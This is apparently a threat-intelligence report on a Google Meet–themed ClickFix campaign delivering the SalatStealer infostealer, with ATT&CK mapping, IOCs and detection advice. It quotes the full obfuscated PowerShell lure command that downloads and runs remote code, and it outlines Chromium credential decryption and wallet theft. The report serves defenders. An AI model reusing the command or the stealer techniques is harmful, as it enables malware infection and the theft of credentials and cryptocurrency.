The Reveal Platform
ClickFix-style social engineering campaigns continue to evolve as threat actors increasingly rely on legitimate Windows utilities and user-assisted execution to evade traditional security controls. In this campaign, attackers impersonate Google Meet through a fraudulent verification portal that tricks victims into executing an obfuscated PowerShell command via the Windows Run dialog.
The infection chain deploys a multi-stage malware workflow leveraging PowerShell and BITSAdmin to retrieve and execute SalatStealer, a Golang-based information stealer targeting browser credentials, session cookies, and cryptocurrency wallet data.
Analysis revealed credential theft functionality targeting Chromium- and Gecko-based browsers, browser extension wallet storage, LevelDB databases, and outbound communication with attacker-controlled infrastructure.
This report examines the infection workflow, PowerShell staging mechanisms, browser credential decryption behavior, wallet theft functionality, and network communication observed during static and dynamic analysis.
The observed infection chain follows a multi-stage execution workflow designed to abuse legitimate Windows functionality while minimizing detection visibility.
online-meet[.]comWin + R)The campaign relies entirely on user-assisted execution rather than exploiting software vulnerabilities. Victims interacting with the fake Google Meet verification page are instructed to execute a malicious PowerShell command through the Windows Run dialog.
powershell -W H -C "$a='i';$b='wr';$c='ie';$d='x';&($c+$d)((&($a+$b) 'https://online-meet.com' -UseB).Content)"
The command launches a hidden PowerShell process and retrieves a remote payload directly into memory using dynamically reconstructed Invoke-WebRequest (IWR) and Invoke-Expression (IEX) commands.
This lightweight obfuscation technique reduces static detection visibility while enabling transient PowerShell-based payload staging.
No evidence of privilege escalation or kernel-level exploitation was observed during execution. The infection chain relies entirely on legitimate Windows utilities and user-assisted execution.
Once executed, the PowerShell loader retrieves a secondary script directly into memory and initiates staged malware delivery.
The downloader abuses BITSAdmin, a legitimate Windows LOLBin (Living Off-the-Land Binary), to retrieve the next-stage payload from attacker-controlled infrastructure and store it within the %TEMP% directory as:
GoogleMeetHelper.exe
Following successful download verification, the malware launches the executable as a detached background process using obfuscated command construction to reduce process visibility.
The downloaded executable was identified as a UPX-packed Golang-based SalatStealer payload.
Analysis of the binary revealed characteristics commonly associated with Golang malware, including statically linked dependencies, Golang runtime artifacts, and broad embedded string references associated with browser and wallet targeting.
Static analysis revealed embedded browser profile enumeration routines and hardcoded wallet directory references within the Golang binary. Additional analysis identified logic associated with Chromium SQLite database access and LevelDB parsing routines commonly used by browser-based cryptocurrency wallets.
To prevent multiple concurrent executions on the infected host, the malware creates the mutex:
WEBR_BGN6AJB4TDY6
This behavior prevents duplicate execution and reduces operational instability on infected hosts.
If the mutex already exists, malware execution terminates.
SalatStealer enumerates browser profile directories associated with Chromium- and Gecko-based browsers to access stored credentials, cookies, autofill data, and session artifacts.
For Chromium-based browsers, the malware extracts the encrypted browser master key from the Local State file and decrypts it using the Windows CryptUnprotectData DPAPI API. The recovered key is subsequently used to decrypt credential and cookie data stored within SQLite databases using AES-GCM encryption.
Targeted browser artifacts include:
Login DataWeb DataNetwork\CookiesThe malware supports a broad set of browsers, expanding credential theft capability across both mainstream and niche browser families.
In addition to browser credential theft, SalatStealer targets cryptocurrency wallet storage locations and browser-extension-based wallet data.
The malware maintains a hardcoded list of wallet directories and associated browser extension storage paths, enabling theft of both standalone wallet artifacts and browser-based cryptocurrency data.
Analysis also revealed targeting of LevelDB databases commonly used by browser extensions to store authentication tokens, wallet metadata, and session information.
Network telemetry revealed repeated outbound encrypted communication with attacker-controlled infrastructure at:
185[.]213[.]240[.]179
The recurring bidirectional communication pattern indicates active command-and-control activity likely associated with beaconing and exfiltration of harvested browser and wallet data.
SOC teams should monitor for:
powershell.exe launched from explorer.exe-W H-WindowStyle HiddenInvoke-Expression (IEX)IWR and IEX| Tactic | Technique ID | Technique Name | Observed Activity |
| Initial Access | T1204 | User Execution | Victim was socially engineered into executing a malicious PowerShell command via the Windows Run dialog |
| Execution | T1059.001 | PowerShell | Obfuscated PowerShell used to download and execute malicious payloads in memory |
| Defense Evasion | T1027 | Obfuscated Files or Information | PowerShell commands reconstructed dynamically using string concatenation to evade detection |
| Defense Evasion | T1197 | BITS Jobs | BITSAdmin abused as a LOLBin to stealthily download the next-stage payload |
| Defense Evasion | T1027.002 | Software Packing | Stage-2 SalatStealer payload was packed using UPX |
| Defense Evasion | T1497.001 | System Checks | Malware created mutex WEBR_BGN6AJB4TDY6 to avoid multiple executions |
| Credential Access | T1555.003 | Credentials from Web Browsers | Browser credentials, autofill data, and login databases harvested from Chromium-based browsers |
| Credential Access | T1539 | Steal Web Session Cookie | Chromium Network\\Cookies databases targeted for session cookie theft |
| Collection | T1005 | Data from Local System | Cryptocurrency wallet files and browser extension data collected from local storage |
| Collection | T1213 | Data from Information Repositories | LevelDB databases targeted to extract wallet/session/token information |
| Command and Control | T1105 | Ingress Tool Transfer | Additional payloads downloaded from remote infrastructure during execution |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | Stolen browser and cryptocurrency data likely exfiltrated through C2 communication channels |
File Hashes (SHA-256)
| IOC | Name |
| a7962ffda8cc0277c013ffd4bd4328e31aea8206b8379a0b574e05a5e5152812 | clickfix.ps1 |
| 8a132e7dd4876c87b5c425db32291bd54a2f3a477c78ceb4d29f297867a150fa | SalatStealer |
C2 URL
| Indicator | Value |
| https://online-meet.com | URL |
| 185.213.240.179 | IP Address |
This campaign demonstrates how ClickFix-style social engineering continues to evolve through abuse of legitimate Windows tooling and user-assisted execution workflows. Rather than relying on software exploitation, the threat actor leverages PowerShell, BITSAdmin, and lightweight obfuscation techniques to stage and deploy SalatStealer while minimizing traditional detection opportunities.
The malware’s extensive browser and cryptocurrency wallet targeting highlights the continued operational focus on credential theft, session hijacking, and digital asset compromise. Detection efforts should prioritize behavioral monitoring of PowerShell execution, LOLBin abuse, anomalous browser database access, and suspicious executable activity originating from user-writable directories.
Contributors:
Pandurang Terkar
Rudra Pratap
